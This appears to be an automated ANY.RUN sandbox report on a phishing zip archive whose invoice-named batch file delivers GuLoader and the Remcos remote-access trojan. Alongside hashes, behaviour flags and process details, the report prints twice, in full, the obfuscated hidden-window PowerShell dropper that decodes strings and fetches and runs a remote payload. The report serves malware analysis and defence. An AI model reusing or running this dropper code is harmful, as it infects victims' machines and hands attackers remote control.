File name:

_5343f66a8990fda03f679d559553ebefe1b0dfcf562cc46e8566505a4f12f34b.zip

Full analysis: https://app.any.run/tasks/3902e40b-dab6-4a29-997b-82b7351a0e83
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Malware Trends Tracker     >>>
Analysis date: November 03, 2025, 08:31:57
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
ipfs
phishing
massbass
remcos
rat
guloader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

48685FEDD82192929201863283D06E13

SHA1:

6F9DED5C458577E57D736FD276C7ACD0F2D2EC9D

SHA256:

5343F66A8990FDA03F679D559553EBEFE1B0DFCF562CC46E8566505A4F12F34B

SSDEEP:

96:eFroQKYNGutd4KD0xXPbbt9IhG+6+u81W1GyIuviFygEzQ0Y44rjN:axGut6EObtahI+Z45vzhlKjN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 7584)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7832)

    • PHISHING has been detected (SURICATA)

      • svchost.exe (PID: 2276)

    • PowerShell executes remote file download (POWERSHELL)

      • powershell.exe (PID: 7832)

    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 7832)

    • GULOADER SHELLCODE has been detected (YARA)

      • msiexec.exe (PID: 2144)

    • GULOADER has been detected (YARA)

      • msiexec.exe (PID: 2144)

    • REMCOS mutex has been found

      • msiexec.exe (PID: 2144)

  • SUSPICIOUS

    • Get information on the list of running processes

      • cmd.exe (PID: 7760)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7760)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 7760)

    • Escape characters obfuscation (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)

    • Potential Corporate Privacy Violation

      • svchost.exe (PID: 2276)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)

    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 7832)

    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 7832)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 4996)

    • Connects to unusual port

      • msiexec.exe (PID: 2144)

  • INFO

    • Manual execution by a user

      • cmd.exe (PID: 7760)
      • powershell.exe (PID: 4996)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)

    • Disables trace logs

      • powershell.exe (PID: 7832)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)

    • Checks proxy server information

      • powershell.exe (PID: 7832)
      • msiexec.exe (PID: 2144)
      • slui.exe (PID: 7272)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4996)

    • Reads the software policy settings

      • msiexec.exe (PID: 2144)
      • slui.exe (PID: 7272)

    • Reads security settings of Internet Explorer

      • msiexec.exe (PID: 2144)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2025:11:02 05:29:50
ZipCRC: 0x994d9e00
ZipCompressedSize: 3746
ZipUncompressedSize: 6075
ZipFileName: INV11036587-, tbilisi SLB-MQ0067-10-25 DB0T4QQH1.bat
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
152
Monitored processes
9
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe #PHISHING svchost.exe powershell.exe no specs conhost.exe no specs #GULOADER msiexec.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2144"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
2276C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
4996"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "del 'vrngendes';function Unvituperatively ($kuttab='checkrytters',$copyright='clickers'){ ;$cembalist=3;do { $cooling+=$kuttab[$cembalist];$cembalist+=4;Out-Host}until (!$kuttab[$cembalist])$cooling}function Impinging ($kvikkernes){.($imprecators) ($kvikkernes)}$yderbanen=[Nullable[int]]0;$statstilskuddet=Unvituperatively ' ==ntt e///TRR .&&&W<<<E';$statstilskuddet+=Unvituperatively ':::Bv,vc,PPl ||IMMMEcccN++ T';$disrealises=Unvituperatively 'EEEM;;;o ,+z z i~~~lQQQl// aJJJ/';$menneskeliggrelse=Unvituperatively 'nnnT|||l===sooo1|.|2';$puttee=' ##[%% NiiiE FFt---.XXXsDDDemmmr^^^V H i &&cTTTe,qqPhhhO YYiWWWNvvvTWWWmttta---nuuuaoooG %%E,hhRI I] ??: II: zzsv,vEss.cPPPU-,-RrrrigggTI.Iy < P ppR AAoS ST ==O kkCii o##,Ljjj=!!!$ MMMGG EZZZN qqNWW efffSzz,KyyyEdddltttIqqqGtttg ++Rtt.EI IlGGGs >>e';$disrealises+=Unvituperatively ' L 5.ll. mm0qq. ZZZ( JJW !!iy ynFFFdsssoww,wooosrrr AA Ngg,TBB. __,1ttt0yyy.oo,0f,f; L S,SW+++iCCCnlll6QQQ4VV ;I I yyyx NN6 < 4YYY;:.: PP rTTTvwww: TT1 MM4_ _4SS .x x0fff) xx *.*G? ?epppcqqqkwwwoBB /PPP2nnn0y y1 TT0bb,0U U1+++0 >>1iii .AF AAiQQ rMM.eT,Tf,wwo mmx___/XX 1 KK4www4>>>.T T0';$mollifiers=Unvituperatively ' mmU<<<s ccekkkRiii-.MMaIIIGgg.E.TTN&& T';$anens=Unvituperatively ' kh k t Bt&&&p __sFF.:PPP/ OO/ oob aaa TTf M.yeeeb###e .|ixxxa //7HHHi## s|| tooofFFFz # u # ps s2***v---i KK5VVVvqqqyIIIcs s5&&&rVVV3 d,qlll3j ju__.oooo2qqqxEEEipppkaaaujjjxNNNb YYpRRRnb b7<< fDD 6~~~7LLLpaa kUUUqiiicTTT4;;;v/ /d ||2 lljNN.iZZ mhhhswww4y ybsssnrrr4|||.===ibbbppp.f^^^sPPP. ,^wggg3F Fsyyy. bblKKKisssn Y.k%%%/ ==Sgggex.xlYYYd~~~s ,leQQQe;;;n Y,. yypzzzs>> m';$attraktivitet68=Unvituperatively 'BB.>';$imprecators=Unvituperatively ' r.i vvEU Ux';$communicative='cack';$skaldyraflejring='\Hastvrks.Mod';Impinging (Unvituperatively ' WWOXXXuEEET .j-|| hLLLoOOOsqqqtRR ;xx $ ##g^^^l |o ??B<<<a:::l gg:BBBK ,AbMMME ||N.hhHoooALLLV FFn= =E DDRGGG= .i$ iie uun Bviii: rraFFFp__ PeeedWWWauuutRRRAGGG+JJJ$bbbStt.K|||aNN,l&&&dFFFY!!!rfffA wwF|||LlllELLLJcc R CCI zzN.~~G');Impinging (Unvituperatively '###oEEEU___TTTT-bbbH~~~oPPPSQQ tCCC;JJJ$^^^Gxxxl UUOMMMB VVayyylBBB:iiiosssVGGGE BBr EEhUUUAv.vn^^^d AALXXXefffDGG =ZZ.$ kkAfffnF,Fe,PPn.vvSyyy.XX sy ypTT lllli B tttt(/ /$.EEaCCCT ZZtdd.rYYYa.ZZKkkkt+++icccv m.ImmmT ggEAAAt|,|6^^^8^^^)');Impinging (Unvituperatively $puttee);$dottard='underhorsing';$anens=$overhandled[$yderbanen];$cembalistnkbslisterne='gavottens';$diabetesproduktet=(Unvituperatively '---OqqqU.||tVVV-~~~hww Ov vS ZZtr r;WWW$gg G>>>Lmm oE.EBoooakkklZZZ: F b ssrBBBU---GNN,eSSSR OOS ppkCCCR !!meeeENN n|||e ~~=AAAnzz,E:::wsss-HHHO%%%bwwwj<<<e TTC.--t mm M Msss,yNNNS SSTll e___M% %. dd$ FFs ITEEEAjjjTGGGS<<<tvvvI~~ LBBBS !!kRRRucccDqqqdii.EJJJt');Impinging ($diabetesproduktet);Impinging (Unvituperatively 'nnn$???bnn r Lu%%%gCCCe! !r __sG Gk;;;r RRm<<<e yyn XXeuuu. h,HJJJe<.<a __d|| eY,Yr# #s kk[z z$ __mqqqo.CCl .glT.Ti .=f,nni-- eQQQrL Lsttt].===: :$hh dEEEiFFFs///r|,|e!!!avv l---iSSSsWWWefffs');$anisostaminous=Unvituperatively 'L LdYY OmmmWyy n';$anisostaminous+=Unvituperatively 'rr.l .cO.XXArrrd%%%foo i OOlfffE';$wedgewise=Unvituperatively ' KK$ !!bS,Sr///uaa g ++eyyyrOOOs ?ksssr ++mAAAe Yn%%%eUUU.NN $===aQQQn***idddsFFFoFFFsnnnt,wwavvvmHHHi f n,IIoyy u ##s:::.OOOI%% n ::v|| oIIIkgggeGGG(EE $ >at,tnrrre ggn.;;s & ,YYY$C CwYYYoaaao AAlrrrskkkk.YYi&&&nooo2 pp7 qq)';$woolskin27=$kbenhavner;del 'beboelseshuse';Impinging (Unvituperatively 'fffoHH uXXXt p -:::hVVVott.s;;;T= =; ==f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&&G.WWlRRRoxxxbjj Af.fliii:ooobJJ.I==,T JJt ##e ffRBBBw^ ^EJJJEwwwDp p=DDD(+++tT.TeFFFSwwwT|||- GpUUUAE EtoooH ~~ vvv$SSSw ddO.PPOeeel VVS,CCk&&&iXXXn&&&2 rr7l l)');del 'ubrdelig';while ((!$bitterweed)) {Impinging (Unvituperatively '.HHO_._ukkktYYY- V Hzzzob bs ##tppp;w w$ ddg>>>l>>>oAAAb,VVa;; l kk:UUUA ||n~~~t &&ix,xc WWoHH m|||mMMMe:: rll cKKKi.VVagggl gi,OOtmmmy P=q q$mmmkOOOa Ty^^^o===i ddnD.Dg') ;Impinging $wedgewise;Impinging (Unvituperatively ' CC[|.|tF.Fh qqR,WWE,&&AU Ud FFicccNgggGJJ,. At~~~hbbbR R,et tavv,d;;;]>>,:///:hhhSJJJLdddEbbbE^^^pnnn(aaa3hhh7 E5___0a.a)');Impinging (Unvituperatively 'aaaoWWWUnnntkkk-pppH ?oh hS **Tccc;.yy$QQQgc cl -OooobSSSA=.=l&&&:TTTbCCCiRRRtBBBt f.EpppR __wj jEfffepppD== =III(,!!Tb bEhhhSYYYtzz -bbbp===aeeet FFHWWW ??$vv.w ||ODDDo???L aaSpp k xxiGGGNUUU2>>>7~~~)') ;Impinging (Unvituperatively '===OVVVun,nTGGG-bbbHxxxO KKsgggT ,W;qqq$ll g,vvlIIIo ,Nb %%ahhhL|||:NNNc___I&& t***ybbbf ,>iIIIeWWWd j,=XXX$ ooG&&&L&& o%%%b UUA O l;;;: ,pUuuuay ymccce== R++ IcccKyyyArrrNVV s^ ^KEEE+eee+ uu%UUU$ !!ohhhv YYE~~~rzzzhZZZA---neeeDXXXlJJJellld YY. nnC%%%o.IIu ##nXXXt') ;$anens=$overhandled[$cityfied]}$steners=219711;$cembalistndflytters=30896;Impinging (Unvituperatively '.DDOIIIUGGGt&&&-!!!H AAO .%sJJJT jj; =$ ::G,FFlHHHon.nB+++aWWWlCCC:NN t___EBB Rk kM^^ i Z Nttta+++ldd.IMMMsWWWE >>dqqq8 XX5|.| nnn=^^^ nnG PPE,nnt ~~-UU.cbbbOl,lN <<t:::e vN:::t || c,c$.mmw///OUUUObbblrrrS ttk***izzzNggg2VV 7');Impinging (Unvituperatively ' ooO mmuRRRt AA-VVVH e.ogg s BBt II; pp$~~~gppplvvvo.FFbe,eaXXXl%%%:bbbWqq.etttihhhr //dUUUl FFe===sOOOs///nvvveHH.s eesq.q .>>= // __ [<<<S###y:::sSSSt^^.eXXXm___.~~ CVVVoHHHn QQvBBBe^^^rH Ht?,?]vv.:kkk:+++F UUr,//o:: m///B===a;;;s HHe???6X X4bbbSr rtOOOr WWicc,nJJJgJ J(FFF$ DDtcccee.erSS.mss i,XXnKK,a& &lc ciBB s IIe vvd i 8VV.5qqq)');Impinging (Unvituperatively '.~~O ::u^^^TXXX-???h-- o bbsmm,T ##;__ $I IgsssLsssO,--BJJ A z lqqq: KKU VVnQQQD% %EeeeR j h~~~O %%rvvvs ++icccN vvG p h h=uuu FFF[~.~T?,?Ezzzx TTtccc.EE EOOONCCCC + ODDDd %%ipppn ++gss ]___:QQQ: ccaMMMS|||C_ _iww iXX .NNNgII eT TtAAAs~~~T ggr| |i_ _NDDDGfff(bbb$uuuW ue ;;ipppR>>>D>>>L ddejjjSdddSz.zN#,#e UUSf.fS nn)');Impinging (Unvituperatively 'zzzo PPu,++tEEE- .ch X oFFFsccct___;Y Y$mmmgcccLGGGoTT BWWWaccclAAA:g,gTqqqAii MWWWB^^ U___r<<<A|||STTT=kk,$rrrulllNJ JdLLLE XXr nnh TTO^^^R E s B I;;;N&&.g++..>>>sTTTu<<<bTTTsVVVt+++rJJ,i wwN G.g,>>(iii$ &&s ZZt---E ^N<<<Ei irXX s.xx,,UU$ ttCAAAeTTTMNNNB:::aooolNNNi nnsaaaTee nXXXd GGF ,YLeeey TTt???T.AAEuuur+++S///)');Impinging $tamburas;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
5516\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7272C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7584"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\_5343f66a8990fda03f679d559553ebefe1b0dfcf562cc46e8566505a4f12f34b.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
7760C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\INV11036587-, tbilisi SLB-MQ0067-10-25 DB0T4QQH1.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
7768\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7832powershell.exe -windowstyle hidden "del 'vrngendes';function Unvituperatively ($kuttab='checkrytters',$copyright='clickers'){ ;$cembalist=3;do { $cooling+=$kuttab[$cembalist];$cembalist+=4;Out-Host}until (!$kuttab[$cembalist])$cooling}function Impinging ($kvikkernes){.($imprecators) ($kvikkernes)}$yderbanen=[Nullable[int]]0;$statstilskuddet=Unvituperatively ' ==ntt e///TRR .&&&W<<<E';$statstilskuddet+=Unvituperatively ':::Bv,vc,PPl ||IMMMEcccN++ T';$disrealises=Unvituperatively 'EEEM;;;o ,+z z i~~~lQQQl// aJJJ/';$menneskeliggrelse=Unvituperatively 'nnnT|||l===sooo1|.|2';$puttee=' ##[%% NiiiE FFt---.XXXsDDDemmmr^^^V H i &&cTTTe,qqPhhhO YYiWWWNvvvTWWWmttta---nuuuaoooG %%E,hhRI I] ??: II: zzsv,vEss.cPPPU-,-RrrrigggTI.Iy < P ppR AAoS ST ==O kkCii o##,Ljjj=!!!$ MMMGG EZZZN qqNWW efffSzz,KyyyEdddltttIqqqGtttg ++Rtt.EI IlGGGs >>e';$disrealises+=Unvituperatively ' L 5.ll. mm0qq. ZZZ( JJW !!iy ynFFFdsssoww,wooosrrr AA Ngg,TBB. __,1ttt0yyy.oo,0f,f; L S,SW+++iCCCnlll6QQQ4VV ;I I yyyx NN6 < 4YYY;:.: PP rTTTvwww: TT1 MM4_ _4SS .x x0fff) xx *.*G? ?epppcqqqkwwwoBB /PPP2nnn0y y1 TT0bb,0U U1+++0 >>1iii .AF AAiQQ rMM.eT,Tf,wwo mmx___/XX 1 KK4www4>>>.T T0';$mollifiers=Unvituperatively ' mmU<<<s ccekkkRiii-.MMaIIIGgg.E.TTN&& T';$anens=Unvituperatively ' kh k t Bt&&&p __sFF.:PPP/ OO/ oob aaa TTf M.yeeeb###e .|ixxxa //7HHHi## s|| tooofFFFz # u # ps s2***v---i KK5VVVvqqqyIIIcs s5&&&rVVV3 d,qlll3j ju__.oooo2qqqxEEEipppkaaaujjjxNNNb YYpRRRnb b7<< fDD 6~~~7LLLpaa kUUUqiiicTTT4;;;v/ /d ||2 lljNN.iZZ mhhhswww4y ybsssnrrr4|||.===ibbbppp.f^^^sPPP. ,^wggg3F Fsyyy. bblKKKisssn Y.k%%%/ ==Sgggex.xlYYYd~~~s ,leQQQe;;;n Y,. yypzzzs>> m';$attraktivitet68=Unvituperatively 'BB.>';$imprecators=Unvituperatively ' r.i vvEU Ux';$communicative='cack';$skaldyraflejring='\Hastvrks.Mod';Impinging (Unvituperatively ' WWOXXXuEEET .j-|| hLLLoOOOsqqqtRR ;xx $ ##g^^^l |o ??B<<<a:::l gg:BBBK ,AbMMME ||N.hhHoooALLLV FFn= =E DDRGGG= .i$ iie uun Bviii: rraFFFp__ PeeedWWWauuutRRRAGGG+JJJ$bbbStt.K|||aNN,l&&&dFFFY!!!rfffA wwF|||LlllELLLJcc R CCI zzN.~~G');Impinging (Unvituperatively '###oEEEU___TTTT-bbbH~~~oPPPSQQ tCCC;JJJ$^^^Gxxxl UUOMMMB VVayyylBBB:iiiosssVGGGE BBr EEhUUUAv.vn^^^d AALXXXefffDGG =ZZ.$ kkAfffnF,Fe,PPn.vvSyyy.XX sy ypTT lllli B tttt(/ /$.EEaCCCT ZZtdd.rYYYa.ZZKkkkt+++icccv m.ImmmT ggEAAAt|,|6^^^8^^^)');Impinging (Unvituperatively $puttee);$dottard='underhorsing';$anens=$overhandled[$yderbanen];$cembalistnkbslisterne='gavottens';$diabetesproduktet=(Unvituperatively '---OqqqU.||tVVV-~~~hww Ov vS ZZtr r;WWW$gg G>>>Lmm oE.EBoooakkklZZZ: F b ssrBBBU---GNN,eSSSR OOS ppkCCCR !!meeeENN n|||e ~~=AAAnzz,E:::wsss-HHHO%%%bwwwj<<<e TTC.--t mm M Msss,yNNNS SSTll e___M% %. dd$ FFs ITEEEAjjjTGGGS<<<tvvvI~~ LBBBS !!kRRRucccDqqqdii.EJJJt');Impinging ($diabetesproduktet);Impinging (Unvituperatively 'nnn$???bnn r Lu%%%gCCCe! !r __sG Gk;;;r RRm<<<e yyn XXeuuu. h,HJJJe<.<a __d|| eY,Yr# #s kk[z z$ __mqqqo.CCl .glT.Ti .=f,nni-- eQQQrL Lsttt].===: :$hh dEEEiFFFs///r|,|e!!!avv l---iSSSsWWWefffs');$anisostaminous=Unvituperatively 'L LdYY OmmmWyy n';$anisostaminous+=Unvituperatively 'rr.l .cO.XXArrrd%%%foo i OOlfffE';$wedgewise=Unvituperatively ' KK$ !!bS,Sr///uaa g ++eyyyrOOOs ?ksssr ++mAAAe Yn%%%eUUU.NN $===aQQQn***idddsFFFoFFFsnnnt,wwavvvmHHHi f n,IIoyy u ##s:::.OOOI%% n ::v|| oIIIkgggeGGG(EE $ >at,tnrrre ggn.;;s & ,YYY$C CwYYYoaaao AAlrrrskkkk.YYi&&&nooo2 pp7 qq)';$woolskin27=$kbenhavner;del 'beboelseshuse';Impinging (Unvituperatively 'fffoHH uXXXt p -:::hVVVott.s;;;T= =; ==f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&&G.WWlRRRoxxxbjj Af.fliii:ooobJJ.I==,T JJt ##e ffRBBBw^ ^EJJJEwwwDp p=DDD(+++tT.TeFFFSwwwT|||- GpUUUAE EtoooH ~~ vvv$SSSw ddO.PPOeeel VVS,CCk&&&iXXXn&&&2 rr7l l)');del 'ubrdelig';while ((!$bitterweed)) {Impinging (Unvituperatively '.HHO_._ukkktYYY- V Hzzzob bs ##tppp;w w$ ddg>>>l>>>oAAAb,VVa;; l kk:UUUA ||n~~~t &&ix,xc WWoHH m|||mMMMe:: rll cKKKi.VVagggl gi,OOtmmmy P=q q$mmmkOOOa Ty^^^o===i ddnD.Dg') ;Impinging $wedgewise;Impinging (Unvituperatively ' CC[|.|tF.Fh qqR,WWE,&&AU Ud FFicccNgggGJJ,. At~~~hbbbR R,et tavv,d;;;]>>,:///:hhhSJJJLdddEbbbE^^^pnnn(aaa3hhh7 E5___0a.a)');Impinging (Unvituperatively 'aaaoWWWUnnntkkk-pppH ?oh hS **Tccc;.yy$QQQgc cl -OooobSSSA=.=l&&&:TTTbCCCiRRRtBBBt f.EpppR __wj jEfffepppD== =III(,!!Tb bEhhhSYYYtzz -bbbp===aeeet FFHWWW ??$vv.w ||ODDDo???L aaSpp k xxiGGGNUUU2>>>7~~~)') ;Impinging (Unvituperatively '===OVVVun,nTGGG-bbbHxxxO KKsgggT ,W;qqq$ll g,vvlIIIo ,Nb %%ahhhL|||:NNNc___I&& t***ybbbf ,>iIIIeWWWd j,=XXX$ ooG&&&L&& o%%%b UUA O l;;;: ,pUuuuay ymccce== R++ IcccKyyyArrrNVV s^ ^KEEE+eee+ uu%UUU$ !!ohhhv YYE~~~rzzzhZZZA---neeeDXXXlJJJellld YY. nnC%%%o.IIu ##nXXXt') ;$anens=$overhandled[$cityfied]}$steners=219711;$cembalistndflytters=30896;Impinging (Unvituperatively '.DDOIIIUGGGt&&&-!!!H AAO .%sJJJT jj; =$ ::G,FFlHHHon.nB+++aWWWlCCC:NN t___EBB Rk kM^^ i Z Nttta+++ldd.IMMMsWWWE >>dqqq8 XX5|.| nnn=^^^ nnG PPE,nnt ~~-UU.cbbbOl,lN <<t:::e vN:::t || c,c$.mmw///OUUUObbblrrrS ttk***izzzNggg2VV 7');Impinging (Unvituperatively ' ooO mmuRRRt AA-VVVH e.ogg s BBt II; pp$~~~gppplvvvo.FFbe,eaXXXl%%%:bbbWqq.etttihhhr //dUUUl FFe===sOOOs///nvvveHH.s eesq.q .>>= // __ [<<<S###y:::sSSSt^^.eXXXm___.~~ CVVVoHHHn QQvBBBe^^^rH Ht?,?]vv.:kkk:+++F UUr,//o:: m///B===a;;;s HHe???6X X4bbbSr rtOOOr WWicc,nJJJgJ J(FFF$ DDtcccee.erSS.mss i,XXnKK,a& &lc ciBB s IIe vvd i 8VV.5qqq)');Impinging (Unvituperatively '.~~O ::u^^^TXXX-???h-- o bbsmm,T ##;__ $I IgsssLsssO,--BJJ A z lqqq: KKU VVnQQQD% %EeeeR j h~~~O %%rvvvs ++icccN vvG p h h=uuu FFF[~.~T?,?Ezzzx TTtccc.EE EOOONCCCC + ODDDd %%ipppn ++gss ]___:QQQ: ccaMMMS|||C_ _iww iXX .NNNgII eT TtAAAs~~~T ggr| |i_ _NDDDGfff(bbb$uuuW ue ;;ipppR>>>D>>>L ddejjjSdddSz.zN#,#e UUSf.fS nn)');Impinging (Unvituperatively 'zzzo PPu,++tEEE- .ch X oFFFsccct___;Y Y$mmmgcccLGGGoTT BWWWaccclAAA:g,gTqqqAii MWWWB^^ U___r<<<A|||STTT=kk,$rrrulllNJ JdLLLE XXr nnh TTO^^^R E s B I;;;N&&.g++..>>>sTTTu<<<bTTTsVVVt+++rJJ,i wwN G.g,>>(iii$ &&s ZZt---E ^N<<<Ei irXX s.xx,,UU$ ttCAAAeTTTMNNNB:::aooolNNNi nnsaaaTee nXXXd GGF ,YLeeey TTt???T.AAEuuur+++S///)');Impinging $tamburas;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
20 228
Read events
20 213
Write events
15
Delete events
0

Modification events

(PID) Process:(7584) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(7584) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(7584) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(7584) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(7584) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(7584) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
